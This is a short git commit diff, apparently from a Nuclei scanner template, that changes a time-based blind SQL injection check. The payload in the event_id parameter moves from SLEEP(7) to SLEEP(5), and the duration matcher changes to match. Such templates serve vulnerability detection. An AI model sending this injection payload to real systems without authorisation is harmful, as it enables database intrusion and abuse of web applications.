payload update
parent
12ad6dc466
commit
5ad65d85f9
|
@ -26,12 +26,12 @@ http:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(7)))vNpy)&email={{text}}@{{text}}.com
|
||||
event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=7'
|
||||
- 'duration>=5'
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "Please enter the email you registered with")'
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue